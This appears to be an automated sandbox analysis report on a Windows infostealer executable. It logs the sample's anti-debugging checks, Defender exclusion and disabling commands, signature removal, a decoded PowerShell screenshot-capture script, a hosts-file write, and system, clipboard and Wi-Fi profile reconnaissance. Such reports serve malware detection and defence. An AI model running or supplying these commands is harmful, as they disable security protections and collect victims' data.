              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess queried: DebugObjectHandleJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess queried: DebugObjectHandleJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA84C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,109_2_00007FF6FAA84C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA89D20 GetProcessHeap,109_2_00007FF6FAA89D20
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA84C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,109_2_00007FF6FAA84C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA7B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,109_2_00007FF6FAA7B52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA7B6D8 SetUnhandledExceptionFilter,109_2_00007FF6FAA7B6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA7A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,109_2_00007FF6FAA7A66C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
              Bypasses PowerShell execution policy
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Encrypted powershell cmdline option found
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Modifies Windows Defender protection settings
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Modifies the hosts file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Removes signatures from Windows Defender
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Users\user\Desktop\KpHYfxnJs6.exe "C:\Users\user\Desktop\KpHYfxnJs6.exe"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
